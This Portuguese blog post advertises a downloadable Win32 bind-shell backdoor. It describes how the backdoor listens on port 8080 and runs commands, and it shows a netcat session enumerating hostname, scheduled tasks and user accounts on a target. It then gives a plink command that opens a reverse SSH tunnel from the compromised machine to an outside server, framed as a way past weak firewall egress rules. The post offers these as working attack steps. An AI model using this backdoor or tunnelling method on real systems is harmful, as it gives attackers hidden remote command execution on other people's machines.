RootSec Remote Win32 BindShell v1.0

O RootSecShell é uma backdoor para sistemas Win32 criada em C++ que pode ser utilizara para criar um canal de acesso em um servidor / estação Windows ( XP / 2000 / 2003 ) utilizando o protocolo TCP.

Ao executar o bindshell a mesma abre uma Listener na porta 8080/tcp aguardando pela conexão do cliente que irá inputar os comandos desejados que serão executados no prompt do sistema com as credenciais do usuário que executou o bindshell.

Ex:

$ nc win32.lab.net 8080
hostname

C:\WINDOWS\SYSTEM32>hostname
morrowinds
at

C:\WINDOWS\SYSTEM32>at
There are no entries in the list.
net user

C:\WINDOWS\SYSTEM32>net user

User accounts for \\MORROWINDS

——————————————————————————-
__vmware_user__ Administrator Suporte
ASPNET Guest HelpAssistant
SUPPORT_388945a0
The command completed successfully.


Como telnet envia caracter por caracter recomendo utilizar o netcat pois ele envia os dados do comando somente quando você da o Enter.

Download aqui: RootSec Win32 BindShell v.10

Uso para o Remote BindShell: Remote win32 BindShell v1.0 + plink = Reverse Port

1-) Rode o Bindshell na maquina destino,

2-) Rode o pelink

> plink.exe -ssh -l usuario -pw senha_usuario -R 2021:127.0.0.1:8080  http://www.servidorssh.com.br

No servidor SSH remoto:

$ nc 127.0.0.1 2021

Enjoy uma politica de saida mal configurada de Firewall.

Thanks: Gratz para o amigo Rodrigo  “Spo0ker” Montoro que deu a dica de uso do RootSec Bindshell com o plink.

Happy Hacking 4 All.

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s